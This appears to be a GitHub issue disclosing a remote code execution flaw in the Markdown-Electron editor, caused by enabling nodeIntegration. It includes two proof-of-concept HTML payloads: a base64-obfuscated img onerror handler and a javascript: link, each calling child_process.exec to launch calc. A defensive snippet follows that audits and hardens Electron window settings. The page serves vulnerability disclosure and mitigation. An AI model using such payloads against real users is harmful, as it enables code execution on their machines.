Markdown-Electron

Incorrect electron configuration causes RCE

Open secnotes opened this issue 2 years ago • 1 comments

nodeIntegration: true decides that Node APIs are enabled in the renderer, and Markdown Editor does not filter dangerous operations. When we use this software to open an unknown markdown file, it may cause remote code execution (RCE).

EXP

# 0 click
<img src=# onerror='eval(new Buffer(`amF2YXNjcmlwdDpyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnY2FsYycsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57YWxlcnQoJ1lvdSB3ZXJlIGhhY2tlZC4nKX0p`, `base64`).toString())'>
# 1 click
<a href="javascript:require('child_process').exec('calc', (error, stdout, stderr)=>{alert('You were hacked.')})">CLICK</a>

poc

secnotes, Feb 03 '23 06:02
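Added example, not code from Markdown-Electron or from the issue: a check that could run in the Electron main process on the options object before it reaches `BrowserWindow`, flagging the `nodeIntegration: true` setting reported above along with related `webPreferences` keys. The function names and the sample options object are assumptions made for this example.

```javascript
// Added example, not Markdown-Electron's own code. Function names are hypothetical.
// Each rule is a real Electron webPreferences key and the value required
// for a window that renders untrusted markdown.
const RULES = [
  { key: 'nodeIntegration', want: false, why: 'renderer scripts can call require()' },
  { key: 'contextIsolation', want: true, why: 'page scripts share a context with preload code' },
  { key: 'sandbox', want: true, why: 'renderer process is not OS-sandboxed' },
  { key: 'webSecurity', want: true, why: 'same-origin policy is disabled' },
];

// Defaults differ between Electron releases, so a key that is left unset is
// reported as well as one set to the unsafe value.
function auditWindowOptions(options) {
  const prefs = (options && options.webPreferences) || {};
  const findings = [];
  for (const { key, want, why } of RULES) {
    if (!(key in prefs)) {
      findings.push(`${key}: not set explicitly (want ${want})`);
    } else if (prefs[key] !== want) {
      findings.push(`${key}: ${prefs[key]} (want ${want}): ${why}`);
    }
  }
  return findings;
}

// Build window options with every audited key forced to its safe value,
// overriding whatever the caller passed for those keys.
function hardenedWindowOptions(extra = {}) {
  const webPreferences = { ...(extra.webPreferences || {}) };
  for (const { key, want } of RULES) webPreferences[key] = want;
  return { ...extra, webPreferences };
}

// Constructed sample: the configuration the issue reports.
const reported = { width: 1024, webPreferences: { nodeIntegration: true } };

// Main-process usage (needs Electron, so it is not run here):
//   const { BrowserWindow } = require('electron');
//   const win = new BrowserWindow(hardenedWindowOptions({ width: 1024 }));
console.log(auditWindowOptions(reported));
console.log(auditWindowOptions(hardenedWindowOptions(reported)));
```

These settings remove Node access from the renderer; they do not stop inline handlers such as `onerror` or `javascript:` links in rendered markdown from running page script, so the rendered HTML still needs sanitising and a Content-Security-Policy.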

In the trial to open a fork

LightYagami28, Mar 14 '25 09:03